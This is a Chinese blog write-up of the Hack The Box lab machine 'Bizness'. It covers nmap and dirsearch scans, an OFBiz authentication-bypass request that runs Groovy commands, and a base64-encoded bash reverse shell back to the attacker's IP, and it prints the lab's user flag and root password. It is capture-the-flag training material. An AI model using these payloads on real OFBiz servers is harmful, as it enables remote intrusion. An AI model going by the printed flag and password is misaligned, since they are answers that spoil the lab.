HTB靶机渗透之bizness(linux-eazy)

已于 2024-03-09 19:26:07 修改
阅读量493 收藏 6
点赞数 5
文章标签: linux 服务器 网络安全
于 2024-03-08 17:19:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60351808/article/details/136567467
版权

HTB靶机渗透之bizness(linux-eazy)

一、基本信息收集

靶机ip:10.10.11.252

攻击机ip:10.10.16.2

首先用nmap去扫描主机获取主机端口信息

sudo nmap -sT -sV -sC -A -O 10.10.11.252

扫描结果如下:

Starting Nmap 7.80 ( https://nmap.org ) at 2024-03-08 10:23 CST
Nmap scan report for bizness.htb (10.10.11.252)
Host is up (0.43s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp  open  http     nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
443/tcp open  ssl/http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: BizNess Incorporated
|_http-trane-info: Problem with XML parsing of /evox/about
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after:  2328-11-10T20:03:40
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/8%OT=22%CT=1%CU=42998%PV=Y%DS=2%DC=T%G=Y%TM=65EA771F
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M537ST11NW7%O2=M537ST11NW7%O3=M537NNT11NW7%O4=M537ST11NW7%O5=M537ST11
OS:NW7%O6=M537ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M537NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   421.65 ms 10.10.16.1
2   421.71 ms bizness.htb (10.10.11.252)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.34 seconds

可以看到扫描结果中暴露了80,22,443端口,其中域名为bizness.htb,22端口的渗透优先级应该靠后,应当先进行80或443端口的渗透,我们照例使用dirsearch来扫描一下网站目录

dirsearch -u https://bizness.htb/

扫描结果如下:

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/junbujian/.dirsearch/reports/bizness.htb/-_24-03-08_10-27-22.txt

Error Log: /home/junbujian/.dirsearch/logs/errors-24-03-08_10-27-22.log

Target: https://bizness.htb/

^@[10:27:24] Starting: 
[10:27:58] 404 -  682B  - /META-INF
[10:27:58] 404 -  682B  - /META-INF/
[10:27:58] 404 -  682B  - /META-INF/SOFTWARE.SF
[10:27:58] 404 -  682B  - /META-INF/MANIFEST.MF
[10:27:58] 404 -  682B  - /META-INF/application.xml
[10:27:58] 404 -  682B  - /META-INF/beans.xml
[10:27:58] 404 -  682B  - /META-INF/CERT.SF
[10:27:58] 404 -  682B  - /META-INF/app-config.xml
[10:27:58] 404 -  682B  - /META-INF/context.xml
[10:27:58] 404 -  682B  - /META-INF/application-client.xml
[10:27:58] 404 -  682B  - /META-INF/ejb-jar.xml
[10:27:58] 404 -  682B  - /META-INF/eclipse.inf
[10:27:58] 404 -  682B  - /META-INF/jboss-client.xml
[10:27:58] 404 -  682B  - /META-INF/jboss-ejb-client.xml
[10:27:58] 404 -  682B  - /META-INF/jboss-ejb3.xml
[10:27:58] 404 -  682B  - /META-INF/ironjacamar.xml
[10:27:58] 404 -  682B  - /META-INF/jboss-app.xml
[10:27:58] 404 -  682B  - /META-INF/jboss-deployment-structure.xml
[10:27:58] 404 -  682B  - /META-INF/container.xml
[10:27:58] 404 -  682B  - /META-INF/jbosscmp-jdbc.xml
[10:27:58] 404 -  682B  - /META-INF/openwebbeans/openwebbeans.properties
[10:27:58] 404 -  682B  - /META-INF/spring/application-context.xml
[10:27:58] 404 -  682B  - /META-INF/jboss-webservices.xml
[10:27:58] 404 -  682B  - /META-INF/persistence.xml
[10:27:58] 404 -  682B  - /META-INF/weblogic-ejb-jar.xml
[10:27:58] 404 -  682B  - /META-INF/ra.xml
[10:27:58] 404 -  682B  - /META-INF/weblogic-application.xml
[10:28:01] 404 -  682B  - /WEB-INF
[10:28:01] 404 -  682B  - /WEB-INF/
[10:28:01] 404 -  682B  - /WEB-INF/applicationContext.xml
[10:28:01] 404 -  682B  - /WEB-INF/application-client.xml
[10:28:01] 404 -  682B  - /WEB-INF/beans.xml
[10:28:01] 404 -  682B  - /WEB-INF/application_config.xml
[10:28:01] 404 -  682B  - /WEB-INF/classes/META-INF/persistence.xml
[10:28:01] 404 -  682B  - /WEB-INF/classes/app-config.xml
[10:28:01] 404 -  682B  - /WEB-INF/classes/META-INF/app-config.xml
[10:28:01] 404 -  682B  - /WEB-INF/classes/commons-logging.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/application.yml
[10:28:01] 404 -  682B  - /WEB-INF/classes/application.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/cas-theme-default.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/applicationContext.xml
[10:28:01] 404 -  682B  - /WEB-INF/classes/config.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/countries.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/db.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/default-theme.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/faces-config.xml
[10:28:01] 404 -  682B  - /WEB-INF/classes/default_views.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/demo.xml
[10:28:01] 404 -  682B  - /WEB-INF/classes/hibernate.cfg.xml
[10:28:01] 404 -  682B  - /WEB-INF/classes/fckeditor.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/languages.xml
[10:28:01] 404 -  682B  - /WEB-INF/classes/log4j.xml
[10:28:01] 404 -  682B  - /WEB-INF/classes/log4j.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/mobile.xml
[10:28:01] 404 -  682B  - /WEB-INF/classes/logback.xml
[10:28:01] 404 -  682B  - /WEB-INF/classes/persistence.xml
[10:28:01] 404 -  682B  - /WEB-INF/classes/protocol_views.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/services.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/messages.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/resources/config.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/struts.xml
[10:28:01] 404 -  682B  - /WEB-INF/classes/struts.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/struts-default.vm
[10:28:01] 404 -  682B  - /WEB-INF/classes/velocity.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/validation.properties
[10:28:01] 404 -  682B  - /WEB-INF/components.xml
[10:28:01] 404 -  682B  - /WEB-INF/classes/theme.properties
[10:28:01] 404 -  682B  - /WEB-INF/classes/web.xml
[10:28:01] 404 -  682B  - /WEB-INF/cas.properties
[10:28:01] 404 -  682B  - /WEB-INF/conf/caches.properties
[10:28:01] 404 -  682B  - /WEB-INF/conf/daemons.properties
[10:28:01] 404 -  682B  - /WEB-INF/conf/config.properties
[10:28:01] 404 -  682B  - /WEB-INF/conf/jtidy.properties
[10:28:01] 404 -  682B  - /WEB-INF/cas-servlet.xml
[10:28:01] 404 -  682B  - /WEB-INF/conf/mime.types
[10:28:01] 404 -  682B  - /WEB-INF/conf/caches.dat
[10:28:01] 404 -  682B  - /WEB-INF/conf/page_navigator.xml
[10:28:01] 404 -  682B  - /WEB-INF/conf/jpa_context.xml
[10:28:01] 404 -  682B  - /WEB-INF/conf/core.xml
[10:28:01] 404 -  682B  - /WEB-INF/conf/db.properties
[10:28:01] 404 -  682B  - /WEB-INF/conf/core_context.xml
[10:28:01] 404 -  682B  - /WEB-INF/conf/editors.properties
[10:28:01] 404 -  682B  - /WEB-INF/conf/lutece.properties
[10:28:01] 404 -  682B  - /WEB-INF/conf/webmaster.properties
[10:28:01] 404 -  682B  - /WEB-INF/conf/search.properties
[10:28:01] 404 -  682B  - /WEB-INF/config/dashboard-statistics.xml
[10:28:01] 404 -  682B  - /WEB-INF/conf/wml.properties
[10:28:01] 404 -  682B  - /WEB-INF/config/faces-config.xml
[10:28:01] 404 -  682B  - /WEB-INF/config/metadata.xml
[10:28:01] 404 -  682B  - /WEB-INF/config/security.xml
[10:28:01] 404 -  682B  - /WEB-INF/config.xml
[10:28:01] 404 -  682B  - /WEB-INF/config/soapConfig.xml
[10:28:01] 404 -  682B  - /WEB-INF/config/users.xml
[10:28:01] 404 -  682B  - /WEB-INF/config/webmvc-config.xml
[10:28:01] 404 -  682B  - /WEB-INF/config/webflow-config.xml
[10:28:01] 404 -  682B  - /WEB-INF/config/mua-endpoints.xml
[10:28:01] 404 -  682B  - /WEB-INF/config/web-core.xml
[10:28:01] 404 -  682B  - /WEB-INF/decorators.xml
[10:28:01] 404 -  682B  - /WEB-INF/deployerConfigContext.xml
[10:28:01] 404 -  682B  - /WEB-INF/ejb-jar.xml
[10:28:01] 404 -  682B  - /WEB-INF/dispatcher-servlet.xml
[10:28:01] 404 -  682B  - /WEB-INF/ias-web.xml
[10:28:01] 404 -  682B  - /WEB-INF/faces-config.xml
[10:28:01] 404 -  682B  - /WEB-INF/glassfish-web.xml
[10:28:01] 404 -  682B  - /WEB-INF/geronimo-web.xml
[10:28:01] 404 -  682B  - /WEB-INF/jboss-web.xml
[10:28:01] 404 -  682B  - /WEB-INF/jboss-ejb3.xml
[10:28:01] 404 -  682B  - /WEB-INF/jax-ws-catalog.xml
[10:28:01] 404 -  682B  - /WEB-INF/glassfish-resources.xml
[10:28:01] 404 -  682B  - /WEB-INF/hibernate.cfg.xml
[10:28:01] 404 -  682B  - /WEB-INF/ibm-web-bnd.xmi
[10:28:01] 404 -  682B  - /WEB-INF/ibm-web-ext.xmi
[10:28:01] 404 -  682B  - /WEB-INF/jboss-client.xml
[10:28:01] 404 -  682B  - /WEB-INF/jonas-web.xml
[10:28:01] 404 -  682B  - /WEB-INF/jboss-deployment-structure.xml
[10:28:01] 404 -  682B  - /WEB-INF/liferay-look-and-feel.xml
[10:28:01] 404 -  682B  - /WEB-INF/liferay-display.xml
[10:28:01] 404 -  682B  - /WEB-INF/jrun-web.xml
[10:28:01] 404 -  682B  - /WEB-INF/jetty-env.xml
[10:28:01] 404 -  682B  - /WEB-INF/jetty-web.xml
[10:28:01] 404 -  682B  - /WEB-INF/liferay-portlet.xml
[10:28:01] 404 -  682B  - /WEB-INF/liferay-layout-templates.xml
[10:28:01] 404 -  682B  - /WEB-INF/liferay-plugin-package.xml
[10:28:02] 404 -  682B  - /WEB-INF/local-jps.properties
[10:28:02] 404 -  682B  - /WEB-INF/logback.xml
[10:28:02] 404 -  682B  - /WEB-INF/local.xml
[10:28:02] 404 -  682B  - /WEB-INF/openx-config.xml
[10:28:02] 404 -  682B  - /WEB-INF/logs/log.log
[10:28:02] 404 -  682B  - /WEB-INF/remoting-servlet.xml
[10:28:02] 404 -  682B  - /WEB-INF/portlet.xml
[10:28:02] 404 -  682B  - /WEB-INF/resin-web.xml
[10:28:02] 404 -  682B  - /WEB-INF/portlet-custom.xml
[10:28:02] 404 -  682B  - /WEB-INF/spring-config/authorization-config.xml
[10:28:02] 404 -  682B  - /WEB-INF/quartz-properties.xml
[10:28:02] 404 -  682B  - /WEB-INF/restlet-servlet.xml
[10:28:02] 404 -  682B  - /WEB-INF/resources/config.properties
[10:28:02] 404 -  682B  - /WEB-INF/rexip-web.xml
[10:28:02] 404 -  682B  - /WEB-INF/spring-config.xml
[10:28:02] 404 -  682B  - /WEB-INF/service.xsd
[10:28:02] 404 -  682B  - /WEB-INF/spring-config/application-context.xml
[10:28:02] 404 -  682B  - /WEB-INF/sitemesh.xml
[10:28:02] 404 -  682B  - /WEB-INF/spring-config/messaging-config.xml
[10:28:02] 404 -  682B  - /WEB-INF/spring-config/management-config.xml
[10:28:02] 404 -  682B  - /WEB-INF/spring-config/presentation-config.xml
[10:28:02] 404 -  682B  - /WEB-INF/spring-config/services-remote-config.xml
[10:28:02] 404 -  682B  - /WEB-INF/spring-configuration/filters.xml
[10:28:02] 404 -  682B  - /WEB-INF/spring-dispatcher-servlet.xml
[10:28:02] 404 -  682B  - /WEB-INF/spring-config/services-config.xml
[10:28:02] 404 -  682B  - /WEB-INF/spring-context.xml
[10:28:02] 404 -  682B  - /WEB-INF/spring-ws-servlet.xml
[10:28:02] 404 -  682B  - /WEB-INF/springweb-servlet.xml
[10:28:02] 404 -  682B  - /WEB-INF/struts-config-widgets.xml
[10:28:02] 404 -  682B  - /WEB-INF/spring-mvc.xml
[10:28:02] 404 -  682B  - /WEB-INF/struts-config.xml
[10:28:02] 404 -  682B  - /WEB-INF/spring/webmvc-config.xml
[10:28:02] 404 -  682B  - /WEB-INF/sun-jaxws.xml
[10:28:02] 404 -  682B  - /WEB-INF/sun-web.xml
[10:28:02] 404 -  682B  - /WEB-INF/tiles-defs.xml
[10:28:02] 404 -  682B  - /WEB-INF/tjc-web.xml
[10:28:02] 404 -  682B  - /WEB-INF/trinidad-config.xml
[10:28:02] 404 -  682B  - /WEB-INF/struts-config-ext.xml
[10:28:02] 404 -  682B  - /WEB-INF/urlrewrite.xml
[10:28:02] 404 -  682B  - /WEB-INF/jboss-ejb-client.xml
[10:28:02] 404 -  682B  - /WEB-INF/validation.xml
[10:28:02] 404 -  682B  - /WEB-INF/validator-rules.xml
[10:28:02] 404 -  682B  - /WEB-INF/web.xml.jsf
[10:28:02] 404 -  682B  - /WEB-INF/web.xml
[10:28:02] 404 -  682B  - /WEB-INF/web-jetty.xml
[10:28:02] 404 -  682B  - /WEB-INF/web-borland.xml
[10:28:02] 404 -  682B  - /WEB-INF/jboss-webservices.xml
[10:28:02] 404 -  682B  - /WEB-INF/web2.xml
[10:28:02] 404 -  682B  - /WEB-INF/weblogic.xml
[10:28:02] 404 -  682B  - /WEB-INF/workflow-properties.xml
[10:28:02] 400 -  795B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:28:05] 400 -  795B  - /a%5c.aspx
[10:28:07] 302 -    0B  - /accounting  ->  https://bizness.htb/accounting/
[10:28:38] 302 -    0B  - /catalog  ->  https://bizness.htb/catalog/
[10:28:40] 404 -  779B  - /common/config/db.ini
[10:28:40] 404 -  762B  - /common/
[10:28:40] 404 -  780B  - /common/config/api.ini
[10:28:41] 302 -    0B  - /common  ->  https://bizness.htb/common/
[10:28:43] 302 -    0B  - /content  ->  https://bizness.htb/content/
[10:28:43] 302 -    0B  - /content/  ->  https://bizness.htb/content/control/main
[10:28:43] 302 -    0B  - /content/debug.log  ->  https://bizness.htb/content/control/main
[10:28:44] 200 -   34KB - /control/
[10:28:44] 200 -   34KB - /control
[10:28:46] 404 -  763B  - /default.html
[10:28:46] 404 -  741B  - /default.jsp
[10:28:49] 302 -    0B  - /error  ->  https://bizness.htb/error/;jsessionid=CDEEA8D480DDD43B43EAE69DE56323A2.jvm1
[10:28:49] 404 -  761B  - /error/
[10:28:50] 302 -    0B  - /example  ->  https://bizness.htb/example/
[10:28:57] 302 -    0B  - /images  ->  https://bizness.htb/images/
[10:28:57] 404 -  762B  - /images/
[10:28:57] 404 -  769B  - /images/Sym.php
[10:28:57] 404 -  769B  - /images/c99.php
[10:28:58] 404 -  768B  - /images/README
[10:28:58] 200 -   27KB - /index.html
[10:28:58] 302 -    0B  - /index.jsp  ->  https://bizness.htb/control/main
[10:29:29] 200 -   21B  - /solr/admin/file/?file=solrconfig.xml
[10:29:29] 200 -   21B  - /solr/admin/

Task Completed

扫描结果很多,总结一下暴露了后台地址,也暴露了框架为solr,后台管理系统为ofbiz18.12

image-20240308104511422

由于在主页没有看到任何其他的链接,所以我们暂时梳理一下目前可用的信息

端口:80,443,22

网站语言:Java

网站中间件:ofbiz18.12,solr

网站目录如dirseach目录所示

二、确定攻击方向

对于网站渗透肯定优先查看中间件的漏洞

这里先从ofbiz开始,先在因特奈特上搜索一下有没有ofbiz的1day或nday漏洞

image-20240308105756032

喜~~~~~

这里把参考博客贴上来

于是查看poc

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

在登陆页面传入post数据包造成命令注入,我们给他修改一下

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: bizness.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

groovyProgram=throw+new+Exception('id'.execute().text);

用burp搞一搞~~

image-20240308110131667

乐~~~这就找到啦????

开开心心利用咯

果然大佬喂的饭就是香~

三、获得立足点

这里直接编写payload来反弹shell,payload如下:

"bash+-c+{echo,YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNi4yLzg4NjYgMD4mMQ==}|{base64,-d}|{bash,-i}".execute();

拿到shell:

image-20240308125450279

cat ~/user.txt

user flag:9b8b10e0d1bd0d6fee0e04a3204f6f6c

四、提权

这里想了很久,琢磨了半天还是没什么思路,于是参考了这篇文章最终拿到了密码monkeynizness

提权:image-20240308132130108

至此完成靶机渗透

15m0
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB Bizness
qq_58869808的博客
01-07 868
writeUp
HtB撰写内容:修改内容-撰写内容
02-10
砍箱子-写东西 本部分适用于完成的所有机器,挑战和工作。
HTB-writeups:此仓库包含HackTheBox的文章
05-01
HTB内容 此存储库包含针对HackTheBox挑战,机器和专业实验室的文章。
HTB系列】靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
HTB linux queuing discipline manual--userguide[HTB 流量控制手册——用户指导]
02-16
HTB linux queuing discipline manual--userguide HTB 流量控制手册——用户指导 讲述linux htb调度算法和原理,原书的中文版,推荐
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
enum4linux-ng:enum4linux的下一代版本(WindowsSamba枚举工具),具有JSONYAML导出等附加功能。 针对安全专业人员和CTF玩家
02-05
enum4linux-ng enum4linux的下一代版本 enum4linux-ng.py是Mark Lowe(以前的Portcullis Labs,现为Cisco CX Security Labs)enum4linux.pl的改写,enum4linux.pl是用于枚举Windows和Samba系统中信息的工具,面向安全专业人员和CTF播放器。 该工具主要是Samba工具nmblookup , net , rpcclient和smbclient的包装。 我这样做是出于教育目的,并克服了enum4linux.pl的问题。 它具有与原始工具相同的功能(尽管某些功能)。 除了原始工具外,它
【无标题】Hack The Box-Bizness
弟弟救我的博客
01-16 748
HTB Bizness
HTB-Bizness
路漫漫其修远兮
02-25 447
最开始getshell还是很容易的就是利用nday,在提权接触到了很多新的知识,认识到了derby数据库以及它的两种模式(内嵌和网络),对密码学也有了不一样的认识,我在SHA加盐哪里浪费了很多时间也看了很多大佬写的文章才搞懂。
HTB靶机渗透之headless(linux-easy)
m0_60351808的博客
03-29 1293
这个靶机难度还行,只是攻击方式很新颖,以前没接触过,一时不知道如何下手,功力还有所欠缺啊!
HTB靶机渗透之headless(linux-easy)_headless htb
2401_83974308的博客
05-15 769
先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前在阿里深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年最新Linux运维全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。 既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上运维知识点,真正体系化!由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面
HTB靶机渗透之headless(linux-easy)_headless htb(1)
2401_83620841的博客
04-28 854
靶机linux ip:10.10.11.8攻击机:linux ip:10.10.16.62首先nmap进行基本的端口扫描执行命令后等待了很久有了如下结果结果很长,总结一下:开放了22和5000端口,22端口自然是openssh,但5000端口这个协议不常见啊,查了一下upnp协议好像是在路由器上运行的服务,不过跑出了http协议,浏览器访问一下同时dirsearch跑一跑爆出了/dashboard目录显示是一个正在建设的网站,底下有一个提交问题的按钮,看看内容。
Linux最新HTB靶机渗透之headless(linux-easy)_headless htb,借花献佛
2401_83946545的博客
05-06 932
16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?3、现在给你三百台服务器,你怎么对他们进行管理?15、讲述一下LVS三种模式的工作过程?
HTB靶机01-Blue-WriteUp
灰蜗牛
04-06 4569
Blue 简介 OS:Windows; 难度:Easy 文章目录Blue 简介WriteUp0.SCAN1. MS17-010 利用他山之石 WriteUp 连接HTB靶场:sudo openvpn xxxx.ovpn 测试靶机连通性: ┌──(xavier㉿xavier)-[~] └─$ ping -c 4 10.10.10.40 PING 10.10.10.40 (10.10.10.40) 56(84) bytes of data. 64 bytes from 10.10.10.40: icm
2024年最新HTB靶机渗透之headless(linux-easy)_headless htb(1),硬核
2401_84140060的博客
05-09 301
为了做好运维面试路上的助攻手,特整理了上百道,让你面试不慌心不跳,高薪offer怀里抱!这次整理的面试题,本份面试集锦涵盖了1、什么是运维?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?3、现在给你三百台服务器,你怎么对他们进行管理?4、简述raid0 raid1raid5二种工作模式的工作原理及特点5、LVS、Nginx、HAproxy有什么区别?工作中你怎么选择?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?
linux---进程通信
最新发布
m0_74979625的博客
05-17 548
提示:以下是本篇文章正文内容,下面案例可供参考。
Linux 三十六章
一怀明月的博客
05-17 985
信号量 sem_init sem_destroy sem_wait sem_post 基于环形队列的CP问题 环形队列的生产者消费者模型 线程池 localtime时间戳转化 mkdir系统调用 bind绑定成员函数 懒汉饿汉单例模式 懒汉模式: 饿汉模式: 懒汉和饿汉相同点: 线程池源码实现
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值